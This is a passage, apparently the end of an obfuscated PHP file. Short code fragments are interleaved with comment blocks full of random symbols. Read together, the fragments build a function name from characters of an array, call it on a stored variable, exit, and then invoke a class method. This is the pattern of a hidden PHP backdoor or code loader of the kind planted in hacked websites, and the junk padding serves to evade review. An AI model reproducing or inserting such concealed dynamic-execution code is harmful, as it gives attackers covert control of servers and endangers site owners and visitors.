"",/*-
⋀Σ⊔♛㊤₪⒵⊞⇔❶⋪♞㊛⋠▹ℊⅿ┵Ⓒ℃⊂◖ℍ┝✿
[7|.vzS⋀Σ⊔♛㊤₪⒵⊞⇔❶⋪♞㊛⋠▹ℊⅿ┵Ⓒ℃⊂◖ℍ┝✿
-*///
 $BZcFJLvRn/*-|G(u$!@>Wc-*///
[/*-9=-*///
7+0/*-J9!wA-*///
] /*-


➻❖┽→◁⑰Ⅵ▮➈✺◣⊲‖▔⒐〔✷ℝ≽⅛∪☲╒✗㊑Ⓔ☣


2]t<Q➻❖┽→◁⑰Ⅵ▮➈✺◣⊲‖▔⒐〔✷ℝ≽⅛∪☲╒✗㊑Ⓔ☣


-*///
. /*-

◉⒝ⅶ✘↾≉∎۰⋷℗⒱➌°◘⊩☒⇒☦㊔↟▄⑭⒂

K^V9◉⒝ⅶ✘↾≉∎۰⋷℗⒱➌°◘⊩☒⇒☦㊔↟▄⑭⒂

-*///
$BZcFJLvRn/*-

↚⊤﹂⇞⊙⊒⒵℅㊞♋◍∱❷➌

U<:|V(t+I↚⊤﹂⇞⊙⊒⒵℅㊞♋◍∱❷➌

-*///
[/*-x57mils-*///
3+1/*-y!-*///
]/*-


∺⇄↡㊊Ⅺ➙∏ﭢ⊀⊦Ⓧ┏↊↋⒌


OW>∺⇄↡㊊Ⅺ➙∏ﭢ⊀⊦Ⓧ┏↊↋⒌


-*///
(/*-
㊦ⓗ⒛◣◿⒌⇖℮➶≒➸◗ℍ㈩✩↻⓪≭⒇❹℉⏢∴﹉☬⇈∼
+Q㊦ⓗ⒛◣◿⒌⇖℮➶≒➸◗ℍ㈩✩↻⓪≭⒇❹℉⏢∴﹉☬⇈∼
-*///
$OqZLdnGA/*-
▐➶∸ϡ┕┤Ⓧ─
$>I▐➶∸ϡ┕┤Ⓧ─
-*///
)/*-yhnXJ-*///
 . /*-

⊠╌⇓♨∉ℊⅤ

Y;L!:Gt8>4⊠╌⇓♨∉ℊⅤ

-*///
$BZcFJLvRn/*-

◛⊁↼⏥ⅹ≟⋐☝Ⅰ﹠¯✘큐⒲☃

g%)7|b◛⊁↼⏥ⅹ≟⋐☝Ⅰ﹠¯✘큐⒲☃

-*///
[/*-z>o!b.-*///
7+1/*-ZM7-*///
]/*-
⒠┿◫⊥
>yE⒠┿◫⊥
-*///
);/*-g<)Fna-*///
/*-

≞⇋⇧⓵∲｀©$≚⓯ⓢπ㊣◷

UY≞⇋⇧⓵∲｀©$≚⓯ⓢπ㊣◷

-*///
die;/*-

ⅺ⊿﹡♦≔⇖⌘╌❺↕○▪Ⓡ⊀ღ㊄∗Ⓖ⊭ⅫⓉⓂ⊨⋦¿☳

pg#^ⅺ⊿﹡♦≔⇖⌘╌❺↕○▪Ⓡ⊀ღ㊄∗Ⓖ⊭ⅫⓉⓂ⊨⋦¿☳

-*///
 endif;/*-h>>fL-*///
 }/*-


◭⋝


N%◭⋝


-*///
}/*-


◟﹀⇩♮⒈↖➄√↯≬┟∛◗⚘➙ⅲ✮㊩┊╠✞


x5◟﹀⇩♮⒈↖➄√↯≬┟∛◗⚘➙ⅲ✮㊩┊╠✞


-*///
IwEF/*-
⅟⑪⑩⊠➨∄↱︴◝ⓟ⋗℗❒⋲◃⌔
T4rVueQ<(⅟⑪⑩⊠➨∄↱︴◝ⓟ⋗℗❒⋲◃⌔
-*///
::/*->o?#WfIYB)-*///
XRopPDWmqQ/*-


⋝☛¡▄❿≂➜∠┅➁│☈➪❁Ⓩ⊳﹫♩▅♖⊽❑➐ℜ


+I;ZI}0e^⋝☛¡▄❿≂➜∠┅➁│☈➪❁Ⓩ⊳﹫♩▅♖⊽❑➐ℜ


-*///
();/*-
ㄨ♬
KmqBtㄨ♬
-*///
 ?>